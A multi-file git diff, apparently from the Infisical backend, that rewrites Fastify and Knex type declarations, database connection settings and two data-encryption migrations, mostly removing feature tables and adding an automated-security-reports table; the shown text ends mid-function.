@@ -166,16 +127,8 @@ declare module "fastify" {
rateLimits: RateLimitConfiguration;
// passport data
passportUser: {
isUserCompleted: boolean;
isUserCompleted: string;
providerAuthToken: string;
externalProviderAccessToken?: string;
};
passportMachineIdentity: {
identityId: string;
user: {
uid: string;
mail?: string;
};
};
kmipUser: {
projectId: string;
@@ -184,9 +137,7 @@ declare module "fastify" {
};
auditLogInfo: Pick<TCreateAuditLogDTO, "userAgent" | "userAgentType" | "ipAddress" | "actor">;
ssoConfig: Awaited<ReturnType<TSamlConfigServiceFactory["getSaml"]>>;
ldapConfig: Awaited<ReturnType<TLdapConfigServiceFactory["getLdapCfg"]>> & {
allowedFields?: TAllowedFields[];
};
ldapConfig: Awaited<ReturnType<TLdapConfigServiceFactory["getLdapCfg"]>>;
}
interface FastifyInstance {
@@ -228,14 +179,10 @@ declare module "fastify" {
identityUa: TIdentityUaServiceFactory;
identityKubernetesAuth: TIdentityKubernetesAuthServiceFactory;
identityGcpAuth: TIdentityGcpAuthServiceFactory;
identityAliCloudAuth: TIdentityAliCloudAuthServiceFactory;
identityTlsCertAuth: TIdentityTlsCertAuthServiceFactory;
identityAwsAuth: TIdentityAwsAuthServiceFactory;
identityAzureAuth: TIdentityAzureAuthServiceFactory;
identityOciAuth: TIdentityOciAuthServiceFactory;
identityOidcAuth: TIdentityOidcAuthServiceFactory;
identityJwtAuth: TIdentityJwtAuthServiceFactory;
identityLdapAuth: TIdentityLdapAuthServiceFactory;
accessApprovalPolicy: TAccessApprovalPolicyServiceFactory;
accessApprovalRequest: TAccessApprovalRequestServiceFactory;
secretApprovalPolicy: TSecretApprovalPolicyServiceFactory;
@@ -251,13 +198,10 @@ declare module "fastify" {
certificateTemplate: TCertificateTemplateServiceFactory;
sshCertificateAuthority: TSshCertificateAuthorityServiceFactory;
sshCertificateTemplate: TSshCertificateTemplateServiceFactory;
sshHost: TSshHostServiceFactory;
sshHostGroup: TSshHostGroupServiceFactory;
certificateAuthority: TCertificateAuthorityServiceFactory;
certificateAuthorityCrl: TCertificateAuthorityCrlServiceFactory;
certificateEst: TCertificateEstServiceFactory;
pkiCollection: TPkiCollectionServiceFactory;
pkiSubscriber: TPkiSubscriberServiceFactory;
secretScanning: TSecretScanningServiceFactory;
license: TLicenseServiceFactory;
trustedIp: TTrustedIpServiceFactory;
@@ -285,17 +229,7 @@ declare module "fastify" {
secretSync: TSecretSyncServiceFactory;
kmip: TKmipServiceFactory;
kmipOperation: TKmipOperationServiceFactory;
gateway: TGatewayServiceFactory;
secretRotationV2: TSecretRotationV2ServiceFactory;
microsoftTeams: TMicrosoftTeamsServiceFactory;
assumePrivileges: TAssumePrivilegeServiceFactory;
githubOrgSync: TGithubOrgSyncServiceFactory;
folderCommit: TFolderCommitServiceFactory;
pit: TPitServiceFactory;
secretScanningV2: TSecretScanningV2ServiceFactory;
internalCertificateAuthority: TInternalCertificateAuthorityServiceFactory;
pkiTemplate: TPkiTemplatesServiceFactory;
reminder: TReminderServiceFactory;
automatedSecurity: TAutomatedSecurityServiceFactory;
};
// this is exclusive use for middlewares in which we need to inject data
// everywhere else access using service layer

View File

@@ -6,9 +6,6 @@ import {
TAccessApprovalPoliciesApprovers,
TAccessApprovalPoliciesApproversInsert,
TAccessApprovalPoliciesApproversUpdate,
TAccessApprovalPoliciesBypassers,
TAccessApprovalPoliciesBypassersInsert,
TAccessApprovalPoliciesBypassersUpdate,
TAccessApprovalPoliciesInsert,
TAccessApprovalPoliciesUpdate,
TAccessApprovalRequests,
@@ -20,9 +17,6 @@ import {
TApiKeys,
TApiKeysInsert,
TApiKeysUpdate,
TAppConnections,
TAppConnectionsInsert,
TAppConnectionsUpdate,
TAuditLogs,
TAuditLogsInsert,
TAuditLogStreams,
@@ -35,6 +29,9 @@ import {
TAuthTokenSessionsUpdate,
TAuthTokensInsert,
TAuthTokensUpdate,
TAutomatedSecurityReports,
TAutomatedSecurityReportsInsert,
TAutomatedSecurityReportsUpdate,
TBackupPrivateKey,
TBackupPrivateKeyInsert,
TBackupPrivateKeyUpdate,
@@ -71,45 +68,15 @@ import {
TDynamicSecrets,
TDynamicSecretsInsert,
TDynamicSecretsUpdate,
TExternalCertificateAuthorities,
TExternalCertificateAuthoritiesInsert,
TExternalCertificateAuthoritiesUpdate,
TExternalGroupOrgRoleMappings,
TExternalGroupOrgRoleMappingsInsert,
TExternalGroupOrgRoleMappingsUpdate,
TExternalKms,
TExternalKmsInsert,
TExternalKmsUpdate,
TFolderCheckpointResources,
TFolderCheckpointResourcesInsert,
TFolderCheckpointResourcesUpdate,
TFolderCheckpoints,
TFolderCheckpointsInsert,
TFolderCheckpointsUpdate,
TFolderCommitChanges,
TFolderCommitChangesInsert,
TFolderCommitChangesUpdate,
TFolderCommits,
TFolderCommitsInsert,
TFolderCommitsUpdate,
TFolderTreeCheckpointResources,
TFolderTreeCheckpointResourcesInsert,
TFolderTreeCheckpointResourcesUpdate,
TFolderTreeCheckpoints,
TFolderTreeCheckpointsInsert,
TFolderTreeCheckpointsUpdate,
TGateways,
TGatewaysInsert,
TGatewaysUpdate,
TGitAppInstallSessions,
TGitAppInstallSessionsInsert,
TGitAppInstallSessionsUpdate,
TGitAppOrg,
TGitAppOrgInsert,
TGitAppOrgUpdate,
TGithubOrgSyncConfigs,
TGithubOrgSyncConfigsInsert,
TGithubOrgSyncConfigsUpdate,
TGroupProjectMembershipRoles,
TGroupProjectMembershipRolesInsert,
TGroupProjectMembershipRolesUpdate,
@@ -125,9 +92,6 @@ import {
TIdentityAccessTokens,
TIdentityAccessTokensInsert,
TIdentityAccessTokensUpdate,
TIdentityAlicloudAuths,
TIdentityAlicloudAuthsInsert,
TIdentityAlicloudAuthsUpdate,
TIdentityAwsAuths,
TIdentityAwsAuthsInsert,
TIdentityAwsAuthsUpdate,
@@ -146,15 +110,15 @@ import {
TIdentityMetadata,
TIdentityMetadataInsert,
TIdentityMetadataUpdate,
TIdentityOciAuths,
TIdentityOciAuthsInsert,
TIdentityOciAuthsUpdate,
TIdentityOidcAuths,
TIdentityOidcAuthsInsert,
TIdentityOidcAuthsUpdate,
TIdentityOrgMemberships,
TIdentityOrgMembershipsInsert,
TIdentityOrgMembershipsUpdate,
TIdentityProfile,
TIdentityProfileInsert,
TIdentityProfileUpdate,
TIdentityProjectAdditionalPrivilege,
TIdentityProjectAdditionalPrivilegeInsert,
TIdentityProjectAdditionalPrivilegeUpdate,
@@ -164,9 +128,6 @@ import {
TIdentityProjectMemberships,
TIdentityProjectMembershipsInsert,
TIdentityProjectMembershipsUpdate,
TIdentityTlsCertAuths,
TIdentityTlsCertAuthsInsert,
TIdentityTlsCertAuthsUpdate,
TIdentityTokenAuths,
TIdentityTokenAuthsInsert,
TIdentityTokenAuthsUpdate,
@@ -185,9 +146,6 @@ import {
TIntegrations,
TIntegrationsInsert,
TIntegrationsUpdate,
TInternalCertificateAuthorities,
TInternalCertificateAuthoritiesInsert,
TInternalCertificateAuthoritiesUpdate,
TInternalKms,
TInternalKmsInsert,
TInternalKmsUpdate,
@@ -227,9 +185,6 @@ import {
TOrgBots,
TOrgBotsInsert,
TOrgBotsUpdate,
TOrgGatewayConfig,
TOrgGatewayConfigInsert,
TOrgGatewayConfigUpdate,
TOrgMemberships,
TOrgMembershipsInsert,
TOrgMembershipsUpdate,
@@ -245,18 +200,12 @@ import {
TPkiCollections,
TPkiCollectionsInsert,
TPkiCollectionsUpdate,
TPkiSubscribers,
TPkiSubscribersInsert,
TPkiSubscribersUpdate,
TProjectBots,
TProjectBotsInsert,
TProjectBotsUpdate,
TProjectEnvironments,
TProjectEnvironmentsInsert,
TProjectEnvironmentsUpdate,
TProjectGateways,
TProjectGatewaysInsert,
TProjectGatewaysUpdate,
TProjectKeys,
TProjectKeysInsert,
TProjectKeysUpdate,
@@ -274,9 +223,6 @@ import {
TProjectSplitBackfillIds,
TProjectSplitBackfillIdsInsert,
TProjectSplitBackfillIdsUpdate,
TProjectSshConfigs,
TProjectSshConfigsInsert,
TProjectSshConfigsUpdate,
TProjectsUpdate,
TProjectTemplates,
TProjectTemplatesInsert,
@@ -303,9 +249,6 @@ import {
TSecretApprovalPoliciesApprovers,
TSecretApprovalPoliciesApproversInsert,
TSecretApprovalPoliciesApproversUpdate,
TSecretApprovalPoliciesBypassers,
TSecretApprovalPoliciesBypassersInsert,
TSecretApprovalPoliciesBypassersUpdate,
TSecretApprovalPoliciesInsert,
TSecretApprovalPoliciesUpdate,
TSecretApprovalRequests,
@@ -353,31 +296,10 @@ import {
TSecretRotations,
TSecretRotationsInsert,
TSecretRotationsUpdate,
TSecretRotationsV2,
TSecretRotationsV2Insert,
TSecretRotationsV2Update,
TSecretRotationV2SecretMappings,
TSecretRotationV2SecretMappingsInsert,
TSecretRotationV2SecretMappingsUpdate,
TSecrets,
TSecretScanningConfigs,
TSecretScanningConfigsInsert,
TSecretScanningConfigsUpdate,
TSecretScanningDataSources,
TSecretScanningDataSourcesInsert,
TSecretScanningDataSourcesUpdate,
TSecretScanningFindings,
TSecretScanningFindingsInsert,
TSecretScanningFindingsUpdate,
TSecretScanningGitRisks,
TSecretScanningGitRisksInsert,
TSecretScanningGitRisksUpdate,
TSecretScanningResources,
TSecretScanningResourcesInsert,
TSecretScanningResourcesUpdate,
TSecretScanningScans,
TSecretScanningScansInsert,
TSecretScanningScansUpdate,
TSecretSharing,
TSecretSharingInsert,
TSecretSharingUpdate,
@@ -395,27 +317,15 @@ import {
TSecretSnapshotsInsert,
TSecretSnapshotsUpdate,
TSecretsUpdate,
TSecretsV2,
TSecretsV2Insert,
TSecretsV2Update,
TSecretSyncs,
TSecretSyncsInsert,
TSecretSyncsUpdate,
TSecretTagJunction,
TSecretTagJunctionInsert,
TSecretTagJunctionUpdate,
TSecretTags,
TSecretTagsInsert,
TSecretTagsUpdate,
TSecretV2TagJunction,
TSecretV2TagJunctionInsert,
TSecretV2TagJunctionUpdate,
TSecretVersions,
TSecretVersionsInsert,
TSecretVersionsUpdate,
TSecretVersionsV2,
TSecretVersionsV2Insert,
TSecretVersionsV2Update,
TSecretVersionTagJunction,
TSecretVersionTagJunctionInsert,
TSecretVersionTagJunctionUpdate,
@@ -443,21 +353,6 @@ import {
TSshCertificateTemplates,
TSshCertificateTemplatesInsert,
TSshCertificateTemplatesUpdate,
TSshHostGroupMemberships,
TSshHostGroupMembershipsInsert,
TSshHostGroupMembershipsUpdate,
TSshHostGroups,
TSshHostGroupsInsert,
TSshHostGroupsUpdate,
TSshHostLoginUserMappings,
TSshHostLoginUserMappingsInsert,
TSshHostLoginUserMappingsUpdate,
TSshHostLoginUsers,
TSshHostLoginUsersInsert,
TSshHostLoginUsersUpdate,
TSshHosts,
TSshHostsInsert,
TSshHostsUpdate,
TSuperAdmin,
TSuperAdminInsert,
TSuperAdminUpdate,
@@ -489,42 +384,24 @@ import {
TWorkflowIntegrationsInsert,
TWorkflowIntegrationsUpdate
} from "@app/db/schemas";
import { TAppConnections, TAppConnectionsInsert, TAppConnectionsUpdate } from "@app/db/schemas/app-connections";
import {
TAccessApprovalPoliciesEnvironments,
TAccessApprovalPoliciesEnvironmentsInsert,
TAccessApprovalPoliciesEnvironmentsUpdate
} from "@app/db/schemas/access-approval-policies-environments";
TExternalGroupOrgRoleMappings,
TExternalGroupOrgRoleMappingsInsert,
TExternalGroupOrgRoleMappingsUpdate
} from "@app/db/schemas/external-group-org-role-mappings";
import { TSecretSyncs, TSecretSyncsInsert, TSecretSyncsUpdate } from "@app/db/schemas/secret-syncs";
import {
TIdentityLdapAuths,
TIdentityLdapAuthsInsert,
TIdentityLdapAuthsUpdate
} from "@app/db/schemas/identity-ldap-auths";
TSecretV2TagJunction,
TSecretV2TagJunctionInsert,
TSecretV2TagJunctionUpdate
} from "@app/db/schemas/secret-v2-tag-junction";
import {
TMicrosoftTeamsIntegrations,
TMicrosoftTeamsIntegrationsInsert,
TMicrosoftTeamsIntegrationsUpdate
} from "@app/db/schemas/microsoft-teams-integrations";
import {
TProjectMicrosoftTeamsConfigs,
TProjectMicrosoftTeamsConfigsInsert,
TProjectMicrosoftTeamsConfigsUpdate
} from "@app/db/schemas/project-microsoft-teams-configs";
import { TReminders, TRemindersInsert, TRemindersUpdate } from "@app/db/schemas/reminders";
import {
TRemindersRecipients,
TRemindersRecipientsInsert,
TRemindersRecipientsUpdate
} from "@app/db/schemas/reminders-recipients";
import {
TSecretApprovalPoliciesEnvironments,
TSecretApprovalPoliciesEnvironmentsInsert,
TSecretApprovalPoliciesEnvironmentsUpdate
} from "@app/db/schemas/secret-approval-policies-environments";
import {
TSecretReminderRecipients,
TSecretReminderRecipientsInsert,
TSecretReminderRecipientsUpdate
} from "@app/db/schemas/secret-reminder-recipients";
TSecretVersionsV2,
TSecretVersionsV2Insert,
TSecretVersionsV2Update
} from "@app/db/schemas/secret-versions-v2";
import { TSecretsV2, TSecretsV2Insert, TSecretsV2Update } from "@app/db/schemas/secrets-v2";
declare module "knex" {
namespace Knex {
@@ -539,17 +416,6 @@ declare module "knex/types/tables" {
interface Tables {
[TableName.Users]: KnexOriginal.CompositeTableType<TUsers, TUsersInsert, TUsersUpdate>;
[TableName.Groups]: KnexOriginal.CompositeTableType<TGroups, TGroupsInsert, TGroupsUpdate>;
[TableName.SshHostGroup]: KnexOriginal.CompositeTableType<
TSshHostGroups,
TSshHostGroupsInsert,
TSshHostGroupsUpdate
>;
[TableName.SshHostGroupMembership]: KnexOriginal.CompositeTableType<
TSshHostGroupMemberships,
TSshHostGroupMembershipsInsert,
TSshHostGroupMembershipsUpdate
>;
[TableName.SshHost]: KnexOriginal.CompositeTableType<TSshHosts, TSshHostsInsert, TSshHostsUpdate>;
[TableName.SshCertificateAuthority]: KnexOriginal.CompositeTableType<
TSshCertificateAuthorities,
TSshCertificateAuthoritiesInsert,
@@ -575,16 +441,6 @@ declare module "knex/types/tables" {
TSshCertificateBodiesInsert,
TSshCertificateBodiesUpdate
>;
[TableName.SshHostLoginUser]: KnexOriginal.CompositeTableType<
TSshHostLoginUsers,
TSshHostLoginUsersInsert,
TSshHostLoginUsersUpdate
>;
[TableName.SshHostLoginUserMapping]: KnexOriginal.CompositeTableType<
TSshHostLoginUserMappings,
TSshHostLoginUserMappingsInsert,
TSshHostLoginUserMappingsUpdate
>;
[TableName.CertificateAuthority]: KnexOriginal.CompositeTableType<
TCertificateAuthorities,
TCertificateAuthoritiesInsert,
@@ -605,16 +461,6 @@ declare module "knex/types/tables" {
TCertificateAuthorityCrlInsert,
TCertificateAuthorityCrlUpdate
>;
[TableName.InternalCertificateAuthority]: KnexOriginal.CompositeTableType<
TInternalCertificateAuthorities,
TInternalCertificateAuthoritiesInsert,
TInternalCertificateAuthoritiesUpdate
>;
[TableName.ExternalCertificateAuthority]: KnexOriginal.CompositeTableType<
TExternalCertificateAuthorities,
TExternalCertificateAuthoritiesInsert,
TExternalCertificateAuthoritiesUpdate
>;
[TableName.Certificate]: KnexOriginal.CompositeTableType<TCertificates, TCertificatesInsert, TCertificatesUpdate>;
[TableName.CertificateTemplate]: KnexOriginal.CompositeTableType<
TCertificateTemplates,
@@ -647,11 +493,6 @@ declare module "knex/types/tables" {
TPkiCollectionItemsInsert,
TPkiCollectionItemsUpdate
>;
[TableName.PkiSubscriber]: KnexOriginal.CompositeTableType<
TPkiSubscribers,
TPkiSubscribersInsert,
TPkiSubscribersUpdate
>;
[TableName.UserGroupMembership]: KnexOriginal.CompositeTableType<
TUserGroupMembership,
TUserGroupMembershipInsert,
@@ -704,11 +545,6 @@ declare module "knex/types/tables" {
[TableName.SuperAdmin]: KnexOriginal.CompositeTableType<TSuperAdmin, TSuperAdminInsert, TSuperAdminUpdate>;
[TableName.ApiKey]: KnexOriginal.CompositeTableType<TApiKeys, TApiKeysInsert, TApiKeysUpdate>;
[TableName.Project]: KnexOriginal.CompositeTableType<TProjects, TProjectsInsert, TProjectsUpdate>;
[TableName.ProjectSshConfig]: KnexOriginal.CompositeTableType<
TProjectSshConfigs,
TProjectSshConfigsInsert,
TProjectSshConfigsUpdate
>;
[TableName.ProjectMembership]: KnexOriginal.CompositeTableType<
TProjectMemberships,
TProjectMembershipsInsert,
@@ -808,16 +644,6 @@ declare module "knex/types/tables" {
TIdentityGcpAuthsInsert,
TIdentityGcpAuthsUpdate
>;
[TableName.IdentityAliCloudAuth]: KnexOriginal.CompositeTableType<
TIdentityAlicloudAuths,
TIdentityAlicloudAuthsInsert,
TIdentityAlicloudAuthsUpdate
>;
[TableName.IdentityTlsCertAuth]: KnexOriginal.CompositeTableType<
TIdentityTlsCertAuths,
TIdentityTlsCertAuthsInsert,
TIdentityTlsCertAuthsUpdate
>;
[TableName.IdentityAwsAuth]: KnexOriginal.CompositeTableType<
TIdentityAwsAuths,
TIdentityAwsAuthsInsert,
@@ -828,11 +654,6 @@ declare module "knex/types/tables" {
TIdentityAzureAuthsInsert,
TIdentityAzureAuthsUpdate
>;
[TableName.IdentityOciAuth]: KnexOriginal.CompositeTableType<
TIdentityOciAuths,
TIdentityOciAuthsInsert,
TIdentityOciAuthsUpdate
>;
[TableName.IdentityOidcAuth]: KnexOriginal.CompositeTableType<
TIdentityOidcAuths,
TIdentityOidcAuthsInsert,
@@ -843,11 +664,6 @@ declare module "knex/types/tables" {
TIdentityJwtAuthsInsert,
TIdentityJwtAuthsUpdate
>;
[TableName.IdentityLdapAuth]: KnexOriginal.CompositeTableType<
TIdentityLdapAuths,
TIdentityLdapAuthsInsert,
TIdentityLdapAuthsUpdate
>;
[TableName.IdentityUaClientSecret]: KnexOriginal.CompositeTableType<
TIdentityUaClientSecrets,
TIdentityUaClientSecretsInsert,
@@ -891,18 +707,6 @@ declare module "knex/types/tables" {
TAccessApprovalPoliciesApproversUpdate
>;
[TableName.AccessApprovalPolicyBypasser]: KnexOriginal.CompositeTableType<
TAccessApprovalPoliciesBypassers,
TAccessApprovalPoliciesBypassersInsert,
TAccessApprovalPoliciesBypassersUpdate
>;
[TableName.AccessApprovalPolicyEnvironment]: KnexOriginal.CompositeTableType<
TAccessApprovalPoliciesEnvironments,
TAccessApprovalPoliciesEnvironmentsInsert,
TAccessApprovalPoliciesEnvironmentsUpdate
>;
[TableName.AccessApprovalRequest]: KnexOriginal.CompositeTableType<
TAccessApprovalRequests,
TAccessApprovalRequestsInsert,
@@ -926,11 +730,6 @@ declare module "knex/types/tables" {
TSecretApprovalPoliciesApproversInsert,
TSecretApprovalPoliciesApproversUpdate
>;
[TableName.SecretApprovalPolicyBypasser]: KnexOriginal.CompositeTableType<
TSecretApprovalPoliciesBypassers,
TSecretApprovalPoliciesBypassersInsert,
TSecretApprovalPoliciesBypassersUpdate
>;
[TableName.SecretApprovalRequest]: KnexOriginal.CompositeTableType<
TSecretApprovalRequests,
TSecretApprovalRequestsInsert,
@@ -951,11 +750,6 @@ declare module "knex/types/tables" {
TSecretApprovalRequestSecretTagsInsert,
TSecretApprovalRequestSecretTagsUpdate
>;
[TableName.SecretApprovalPolicyEnvironment]: KnexOriginal.CompositeTableType<
TSecretApprovalPoliciesEnvironments,
TSecretApprovalPoliciesEnvironmentsInsert,
TSecretApprovalPoliciesEnvironmentsUpdate
>;
[TableName.SecretRotation]: KnexOriginal.CompositeTableType<
TSecretRotations,
TSecretRotationsInsert,
@@ -1142,107 +936,15 @@ declare module "knex/types/tables" {
TKmipClientCertificatesInsert,
TKmipClientCertificatesUpdate
>;
[TableName.Gateway]: KnexOriginal.CompositeTableType<TGateways, TGatewaysInsert, TGatewaysUpdate>;
[TableName.ProjectGateway]: KnexOriginal.CompositeTableType<
TProjectGateways,
TProjectGatewaysInsert,
TProjectGatewaysUpdate
[TableName.IdentityProfile]: KnexOriginal.CompositeTableType<
TIdentityProfile,
TIdentityProfileInsert,
TIdentityProfileUpdate
>;
[TableName.OrgGatewayConfig]: KnexOriginal.CompositeTableType<
TOrgGatewayConfig,
TOrgGatewayConfigInsert,
TOrgGatewayConfigUpdate
>;
[TableName.SecretRotationV2]: KnexOriginal.CompositeTableType<
TSecretRotationsV2,
TSecretRotationsV2Insert,
TSecretRotationsV2Update
>;
[TableName.SecretRotationV2SecretMapping]: KnexOriginal.CompositeTableType<
TSecretRotationV2SecretMappings,
TSecretRotationV2SecretMappingsInsert,
TSecretRotationV2SecretMappingsUpdate
>;
[TableName.MicrosoftTeamsIntegrations]: KnexOriginal.CompositeTableType<
TMicrosoftTeamsIntegrations,
TMicrosoftTeamsIntegrationsInsert,
TMicrosoftTeamsIntegrationsUpdate
>;
[TableName.ProjectMicrosoftTeamsConfigs]: KnexOriginal.CompositeTableType<
TProjectMicrosoftTeamsConfigs,
TProjectMicrosoftTeamsConfigsInsert,
TProjectMicrosoftTeamsConfigsUpdate
>;
[TableName.SecretReminderRecipients]: KnexOriginal.CompositeTableType<
TSecretReminderRecipients,
TSecretReminderRecipientsInsert,
TSecretReminderRecipientsUpdate
>;
[TableName.GithubOrgSyncConfig]: KnexOriginal.CompositeTableType<
TGithubOrgSyncConfigs,
TGithubOrgSyncConfigsInsert,
TGithubOrgSyncConfigsUpdate
>;
[TableName.FolderCommit]: KnexOriginal.CompositeTableType<
TFolderCommits,
TFolderCommitsInsert,
TFolderCommitsUpdate
>;
[TableName.FolderCommitChanges]: KnexOriginal.CompositeTableType<
TFolderCommitChanges,
TFolderCommitChangesInsert,
TFolderCommitChangesUpdate
>;
[TableName.FolderCheckpoint]: KnexOriginal.CompositeTableType<
TFolderCheckpoints,
TFolderCheckpointsInsert,
TFolderCheckpointsUpdate
>;
[TableName.FolderCheckpointResources]: KnexOriginal.CompositeTableType<
TFolderCheckpointResources,
TFolderCheckpointResourcesInsert,
TFolderCheckpointResourcesUpdate
>;
[TableName.FolderTreeCheckpoint]: KnexOriginal.CompositeTableType<
TFolderTreeCheckpoints,
TFolderTreeCheckpointsInsert,
TFolderTreeCheckpointsUpdate
>;
[TableName.FolderTreeCheckpointResources]: KnexOriginal.CompositeTableType<
TFolderTreeCheckpointResources,
TFolderTreeCheckpointResourcesInsert,
TFolderTreeCheckpointResourcesUpdate
>;
[TableName.SecretScanningDataSource]: KnexOriginal.CompositeTableType<
TSecretScanningDataSources,
TSecretScanningDataSourcesInsert,
TSecretScanningDataSourcesUpdate
>;
[TableName.SecretScanningResource]: KnexOriginal.CompositeTableType<
TSecretScanningResources,
TSecretScanningResourcesInsert,
TSecretScanningResourcesUpdate
>;
[TableName.SecretScanningScan]: KnexOriginal.CompositeTableType<
TSecretScanningScans,
TSecretScanningScansInsert,
TSecretScanningScansUpdate
>;
[TableName.SecretScanningFinding]: KnexOriginal.CompositeTableType<
TSecretScanningFindings,
TSecretScanningFindingsInsert,
TSecretScanningFindingsUpdate
>;
[TableName.SecretScanningConfig]: KnexOriginal.CompositeTableType<
TSecretScanningConfigs,
TSecretScanningConfigsInsert,
TSecretScanningConfigsUpdate
>;
[TableName.Reminder]: KnexOriginal.CompositeTableType<TReminders, TRemindersInsert, TRemindersUpdate>;
[TableName.ReminderRecipient]: KnexOriginal.CompositeTableType<
TRemindersRecipients,
TRemindersRecipientsInsert,
TRemindersRecipientsUpdate
[TableName.AutomatedSecurityReports]: KnexOriginal.CompositeTableType<
TAutomatedSecurityReports,
TAutomatedSecurityReportsInsert,
TAutomatedSecurityReportsUpdate
>;
}
}

View File

@@ -1,6 +1,6 @@
import knex, { Knex } from "knex";
export type TDbClient = Knex;
export type TDbClient = ReturnType<typeof initDbConnection>;
export const initDbConnection = ({
dbConnectionUri,
dbRootCert,
@@ -50,8 +50,6 @@ export const initDbConnection = ({
}
: false
},
// https://knexjs.org/guide/#pool
pool: { min: 0, max: 10 },
migrations: {
tableName: "infisical_migrations"
}
@@ -72,8 +70,7 @@ export const initDbConnection = ({
},
migrations: {
tableName: "infisical_migrations"
},
pool: { min: 0, max: 10 }
}
});
});
@@ -110,8 +107,7 @@ export const initAuditLogDbConnection = ({
},
migrations: {
tableName: "infisical_migrations"
},
pool: { min: 0, max: 10 }
}
});
// we add these overrides so that auditLogDb and the primary DB are interchangeable

View File

@@ -4,7 +4,6 @@ import "ts-node/register";
import dotenv from "dotenv";
import type { Knex } from "knex";
import path from "path";
import { initLogger } from "@app/lib/logger";
// Update with your config settings. .
dotenv.config({
@@ -14,8 +13,6 @@ dotenv.config({
path: path.join(__dirname, "../../../.env")
});
initLogger();
export default {
development: {
client: "postgres",
@@ -42,7 +39,7 @@ export default {
},
migrations: {
tableName: "infisical_migrations",
loadExtensions: [".mjs", ".ts"]
loadExtensions: [".mjs"]
}
},
production: {
@@ -67,7 +64,7 @@ export default {
},
migrations: {
tableName: "infisical_migrations",
loadExtensions: [".mjs", ".ts"]
loadExtensions: [".mjs"]
}
}
} as Knex.Config;

View File

@@ -16,7 +16,7 @@ const createAuditLogPartition = async (knex: Knex, startDate: Date, endDate: Dat
const startDateStr = formatPartitionDate(startDate);
const endDateStr = formatPartitionDate(endDate);
const partitionName = `${TableName.AuditLog}_${startDateStr.replaceAll("-", "")}_${endDateStr.replaceAll("-", "")}`;
const partitionName = `${TableName.AuditLog}_${startDateStr.replace(/-/g, "")}_${endDateStr.replace(/-/g, "")}`;
await knex.schema.raw(
`CREATE TABLE ${partitionName} PARTITION OF ${TableName.AuditLog} FOR VALUES FROM ('${startDateStr}') TO ('${endDateStr}')`

View File

@@ -1,10 +1,9 @@
import { Knex } from "knex";
import { inMemoryKeyStore } from "@app/keystore/memory";
import { crypto } from "@app/lib/crypto/cryptography";
import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
import { initLogger } from "@app/lib/logger";
import { KmsDataKey } from "@app/services/kms/kms-types";
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
import { SecretKeyEncoding, TableName } from "../schemas";
import { getMigrationEnvConfig } from "./utils/env-config";
@@ -27,12 +26,9 @@ export async function up(knex: Knex): Promise<void> {
}
initLogger();
const superAdminDAL = superAdminDALFactory(knex);
const envConfig = await getMigrationEnvConfig(superAdminDAL);
const envConfig = getMigrationEnvConfig();
const keyStore = inMemoryKeyStore();
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
const projectEncryptionRingBuffer =
createCircularCache<Awaited<ReturnType<(typeof kmsService)["createCipherPairWithDataKey"]>>>(25);
const webhooks = await knex(TableName.Webhook)
@@ -69,15 +65,12 @@ export async function up(knex: Knex): Promise<void> {
let encryptedSecretKey = null;
if (el.encryptedSecretKey && el.iv && el.tag && el.keyEncoding) {
const decyptedSecretKey = crypto
.encryption()
.symmetric()
.decryptWithRootEncryptionKey({
keyEncoding: el.keyEncoding as SecretKeyEncoding,
iv: el.iv,
tag: el.tag,
ciphertext: el.encryptedSecretKey
});
const decyptedSecretKey = infisicalSymmetricDecrypt({
keyEncoding: el.keyEncoding as SecretKeyEncoding,
iv: el.iv,
tag: el.tag,
ciphertext: el.encryptedSecretKey
});
encryptedSecretKey = projectKmsService.encryptor({
plainText: Buffer.from(decyptedSecretKey, "utf8")
}).cipherTextBlob;
@@ -85,15 +78,12 @@ export async function up(knex: Knex): Promise<void> {
const decryptedUrl =
el.urlIV && el.urlTag && el.urlCipherText && el.keyEncoding
? crypto
.encryption()
.symmetric()
.decryptWithRootEncryptionKey({
keyEncoding: el.keyEncoding as SecretKeyEncoding,
iv: el.urlIV,
tag: el.urlTag,
ciphertext: el.urlCipherText
})
? infisicalSymmetricDecrypt({
keyEncoding: el.keyEncoding as SecretKeyEncoding,
iv: el.urlIV,
tag: el.urlTag,
ciphertext: el.urlCipherText
})
: null;
const encryptedUrl = projectKmsService.encryptor({

View File

@@ -1,11 +1,10 @@
import { Knex } from "knex";
import { inMemoryKeyStore } from "@app/keystore/memory";
import { crypto } from "@app/lib/crypto/cryptography";
import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
import { selectAllTableCols } from "@app/lib/knex";
import { initLogger } from "@app/lib/logger";
import { KmsDataKey } from "@app/services/kms/kms-types";
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
import { SecretKeyEncoding, TableName } from "../schemas";
import { getMigrationEnvConfig } from "./utils/env-config";
@@ -30,9 +29,7 @@ export async function up(knex: Knex): Promise<void> {
}
initLogger();
const superAdminDAL = superAdminDALFactory(knex);
const envConfig = await getMigrationEnvConfig(superAdminDAL);
const envConfig = getMigrationEnvConfig();
const keyStore = inMemoryKeyStore();
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
const projectEncryptionRingBuffer =
@@ -63,23 +60,20 @@ export async function up(knex: Knex): Promise<void> {
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
el.inputIV && el.inputTag && el.inputCiphertext && el.keyEncoding
? crypto
.encryption()
.symmetric()
.decryptWithRootEncryptionKey({
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
keyEncoding: el.keyEncoding as SecretKeyEncoding,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.inputIV,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
tag: el.inputTag,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
ciphertext: el.inputCiphertext
})
? infisicalSymmetricDecrypt({
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
keyEncoding: el.keyEncoding as SecretKeyEncoding,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.inputIV,
